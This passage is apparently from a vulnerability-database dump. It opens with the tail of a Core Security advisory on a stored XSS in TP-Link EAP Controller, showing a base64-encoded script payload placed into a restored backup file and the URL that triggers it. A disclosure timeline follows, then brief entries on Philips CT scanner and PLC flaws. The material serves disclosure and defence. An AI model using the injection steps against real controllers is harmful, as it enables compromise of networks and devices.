The implementation of portalPictureUpload can be abused and leads to a stored Cross-Site Scripting.
Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB). In the following example we encode "<script>alert(1)</script>" in base64; the result is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==", so we replace the fileData with it and restore the backup file.

/-----
<picturefiles>
  <file>
    <fileId>5a383b962dc07622f0bdc101</fileId>
    <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData>
  </file>
</picturefiles>
-----/

To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId from the example).

8. **Report Timeline**

2018-01-12: Core Security sent an initial notification to TP-Link, asking for GPG keys in order to send the draft advisory.
2018-01-14: TP-Link answered asking for the advisory in clear text.
2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form.
2018-01-29: TP-Link informed Core Security that they had checked the draft advisory and were going to fix the vulnerabilities.
2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and requested an estimated release date for the fix.
2018-02-07: TP-Link informed that they were working on a beta version of the fix and would provide it to Core Security for testing.
2018-02-07: Core Security thanked TP-Link for the answer and asked for a tentative date for this beta version.
2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix.
2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again.
2018-03-01: Core Security thanked TP-Link for the answer and requested regular contact until the release of the fixed version.
2018-03-19: Core Security requested a status update.
2018-03-21: TP-Link confirmed that the new version would be available in early April.
2018-03-26: Core Security thanked TP-Link for the reply and asked for a solidified release date.
2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities.
2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed.
2018-04-17: Core Security set the release date to May 3rd at 12 PM EST.

9. **References**

[1] https://www.tp-link.com/en/products/details/EAP-Controller.html
[2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide the actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, the Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. **Disclaimer**

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

This advisory has been signed with the GPG key of the Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201805-0941 CVE-2018-8861 Philips Brilliance CT Scanners Unauthorized Access Vulnerability CVSS V2: 6.8
CVSS V3: 8.7
Severity: HIGH
Vulnerabilities within the Philips Brilliance CT kiosk environment (Brilliance 64 version 2.6.2 and prior, Brilliance iCT versions 4.1.6 and prior, Brilliance iCT SP versions 3.2.4 and prior, and Brilliance CT Big Bore 2.3.5 and prior) could enable a limited-access kiosk user or an unauthorized attacker to break out of the containment of the kiosk environment, attain elevated privileges on the underlying Windows OS, and access unauthorized resources from the operating system. Multiple Philips products contain an access control vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Philips Brilliance 64 and others are CT scanners from Philips, the Netherlands. There are security holes in the kiosk environment of several Philips Brilliance CT devices. Philips Brilliance Computed Tomography Systems are prone to the following security vulnerabilities: 1. A local privilege-escalation vulnerability. 2. Multiple local information-disclosure vulnerabilities. An attacker may leverage these issues to obtain sensitive information or gain elevated privileges; this can result in arbitrary code execution within the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions. Philips Brilliance 64 etc
VAR-201805-0938 CVE-2018-8853 Multiple Philips products: Vulnerabilities related to authorization, authority, and access control CVSS V2: 7.2
CVSS V3: 8.8
Severity: HIGH
Philips Brilliance CT devices operate user functions from within a contained kiosk in a Microsoft Windows operating system. Windows boots by default with elevated Windows privileges, enabling a kiosk application, user, or an attacker to potentially attain unauthorized elevated privileges in Brilliance 64 version 2.6.2 and prior, Brilliance iCT versions 4.1.6 and prior, Brilliance iCT SP versions 3.2.4 and prior, and Brilliance CT Big Bore 2.3.5 and prior. Also, attackers may gain access to unauthorized resources from the underlying Windows operating system. Multiple Philips products contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). Philips Brilliance 64 and others are CT scanners from Philips, the Netherlands. There are security holes in several Philips Brilliance CT devices. Philips Brilliance Computed Tomography Systems are prone to the following security vulnerabilities: 1. A local privilege-escalation vulnerability. 2. Multiple local information-disclosure vulnerabilities. An attacker may leverage these issues to obtain sensitive information or gain elevated privileges; this can result in arbitrary code execution within the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions. Philips Brilliance 64 etc
VAR-201805-0939 CVE-2018-8857 Multiple Philips products: Vulnerabilities related to the use of hard-coded credentials CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
Philips Brilliance CT software (Brilliance 64 version 2.6.2 and prior, Brilliance iCT versions 4.1.6 and prior, Brilliance iCT SP versions 3.2.4 and prior, and Brilliance CT Big Bore 2.3.5 and prior) contains fixed credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. An attacker could compromise these credentials and gain access to the system. Multiple Philips products contain a vulnerability related to the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). Philips Brilliance 64 and others are CT scanners from Philips, the Netherlands. Several Philips Brilliance CT devices contain a security vulnerability arising from hard-coded credentials (such as passwords or encryption keys) in the device software. Philips Brilliance Computed Tomography Systems are prone to the following security vulnerabilities: 1. A local privilege-escalation vulnerability. 2. Multiple local information-disclosure vulnerabilities. An attacker may leverage these issues to obtain sensitive information or gain elevated privileges; this can result in arbitrary code execution within the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions. Philips Brilliance 64 etc
VAR-201805-1203 No CVE DCCE MAC1100 PLC has an information disclosure vulnerability (CNVD-2018-08782) CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The MAC1100 PLC is a Programmable Logic Controller (PLC) in the Dalian CECE PLC series. This product is widely used in important industrial control sites such as intelligent buildings, power data monitoring, thermal control systems, and enterprise management systems. The DCCE MAC1100 PLC has an information disclosure vulnerability. The vulnerability originates from the MAC1100 PLC using the EPA protocol to communicate on port 11000. An attacker can use the vulnerability to read a specific storage area and collect device information from the PLC, which can be used for PLC device identification attacks.
VAR-201805-1205 No CVE Hollysys LE5109L PLC has a buffer overflow vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Hollysys Group is a professional automation company integrating R&D, production, sales and technical services. Hollysys PLCs, with integrated Ethernet, PROFIBUS-DP, RS232 and RS485 interfaces, have been widely used in the power, chemical, metallurgy, energy and other fields. The Hollysys LE5109L PLC has a buffer overflow vulnerability. An attacker can use this vulnerability to cause a buffer overflow in the Hollysys PLC by constructing a specific Modbus network packet. The CPU enters a failure mode and cannot be pinged; it automatically restarts after a period of time.